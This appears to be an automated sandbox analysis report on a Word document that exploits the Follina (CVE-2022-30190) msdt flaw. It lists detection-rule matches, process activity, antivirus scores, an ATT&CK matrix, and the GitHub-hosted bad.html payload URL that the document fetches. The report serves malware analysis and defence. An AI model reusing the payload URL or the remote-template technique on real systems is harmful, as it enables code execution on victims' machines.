      Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
      Source: dl18aYTBo5.docxVirustotal: Detection: 50%
      Source: dl18aYTBo5.docxMetadefender: Detection: 20%
      Source: dl18aYTBo5.docxReversingLabs: Detection: 27%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
      Source: dl18aYTBo5.LNK.0.drLNK file: ..\..\..\..\..\Desktop\dl18aYTBo5.docx
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{1E1C1011-FF8D-4BE2-AE04-C2B3A2CB9A76} - OProcSessId.datJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
      Source: classification engineClassification label: mal96.expl.evad.winDOCX@3/15@2/2
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Persistence and Installation Behavior

      barindex
      Source: document.xml.relsExtracted files from sample: https://raw.githubusercontent.com/drgreenthumb93/cve-2022-30190-follina/main/bad.html!
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts13
      Exploitation for Client Execution
      1
      DLL Side-Loading
      1
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Query Registry
      Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Process Injection
      LSASS Memory2
      File and Directory Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
      Non-Application Layer Protocol
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading
      Security Account Manager12
      System Information Discovery
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration14
      Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
      Remote System Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer3
      Ingress Tool Transfer
      SIM Card SwapCarrier Billing Fraud
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      dl18aYTBo5.docx51%VirustotalBrowse
      dl18aYTBo5.docx20%MetadefenderBrowse
      dl18aYTBo5.docx28%ReversingLabsDocument-Word.Exploit.Heuristic
      dl18aYTBo5.docx100%AviraW97M/Dldr.Agent.G1
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html100%AviraJS/CVE-2022-30190.G
      No Antivirus matches
      SourceDetectionScannerLabelLink
      raw.githubusercontent.com1%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://roaming.edog.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://my.microsoftpersonalcontent.com0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://api.aadrm.com0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://raw.githubusercontent.com/drgreenthumb93/CVE-2022-30190-follina/main/bad.html6%VirustotalBrowse
      https://raw.githubusercontent.com/drgreenthumb93/CVE-2022-30190-follina/main/bad.html0%Avira URL Cloudsafe
      https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      raw.githubusercontent.com
      185.199.108.133
      truetrueunknown
      NameMaliciousAntivirus DetectionReputation
      https://raw.githubusercontent.com/drgreenthumb93/CVE-2022-30190-follina/main/bad.htmltrue
      • 6%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
        high
        https://login.microsoftonline.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
          high
          https://shell.suite.office.com:1443CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
              high
              https://autodiscover-s.outlook.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                high
                https://roaming.edog.CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                • URL Reputation: safe
                unknown
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                  high
                  https://cdn.entity.CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/queryCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkeyCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                        high
                        https://powerlift.acompli.netCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v1CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                          high
                          https://cortana.aiCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspxCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                    high
                                    https://api.aadrm.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                    • URL Reputation: safe
                                    unknown
